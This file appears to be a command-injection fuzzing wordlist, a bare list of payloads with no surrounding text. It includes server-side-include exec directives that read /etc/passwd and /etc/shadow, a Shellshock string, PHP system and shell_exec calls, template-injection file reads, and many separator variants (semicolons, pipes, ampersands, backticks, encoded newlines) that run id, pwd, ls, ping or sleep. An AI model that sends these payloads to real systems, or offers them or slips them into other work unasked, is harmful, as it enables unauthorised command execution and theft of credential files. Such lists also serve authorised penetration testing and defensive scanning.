&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
/index.html|id|
;id;
;id
;netstat -a;
;system('cat%20/etc/passwd')
|id
|/usr/bin/id
|id|
|/usr/bin/id|
||/usr/bin/id|
|id;
||/usr/bin/id;
;id|
;|/usr/bin/id|
\n/bin/ls -al\n
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
`/usr/bin/id`
a);id
a;id
a);id;
a;id;
a);id|
a;id|
a)|id
a|id
a)|id;
|/bin/ls -al
a);/usr/bin/id
a;/usr/bin/id
a);/usr/bin/id;
a;/usr/bin/id;
a);/usr/bin/id|
a;/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
;system('id')
;system('/usr/bin/id')
%0A/usr/bin/id
%0Aid
%0A/usr/bin/id%0A
%0Aid%0A
& ping -i 3 127.0.0.1 &
& ping -n 3 127.0.0.1 &
%0a ping -i 3 127.0.0.1 %0a
`ping -i 3 127.0.0.1`
| id
& id
; id
%0a id %0a
`id`
$;/usr/bin/id
() { :;}; /bin/bash -c "sleep 5 && echo vulnerable 5"
cat /etc/hosts
$(`cat /etc/passwd`)
cat /etc/passwd
`sleep 5`
%0Acat%20/etc/passwd
{{ get_user_file("/etc/passwd") }}
<!--#exec cmd="/bin/cat /etc/passwd"-->
<!--#exec cmd="/bin/cat /etc/shadow"-->
<!--#exec cmd="/usr/bin/id;-->
system('cat /etc/passwd');
<?php system("cat /etc/passwd"); ?>
<?php phpinfo(); ?>
<?php $output=shell_exec('uname -a'); echo "<pre>$output</pre>";?>
; pwd; #
'; pwd; #
); pwd; #
)}'; pwd; #
))}'; pwd; #
)))}'; pwd; #
)}'; pwd; '
))}'; pwd; '
)))}'; pwd; '
| pwd; #
'| pwd; #
)| pwd; #
)}'| pwd; #
))}'| pwd; #
)))}'| pwd; #
)}'| pwd; '
))}'| pwd; '
)))}'| pwd; '
&& pwd; #
'&& pwd; #
)&& pwd; #
)}'&& pwd; #
))}'&& pwd; #
)))}'&& pwd; #
)}'&& pwd; '
))}'&& pwd; '
)))}'&& pwd; '
& pwd; #
'& pwd; #
)& pwd; #
)}'& pwd; #
))}'& pwd; #
)))}'& pwd; #
)}'& pwd; '
))}'& pwd; '
)))}'& pwd; '
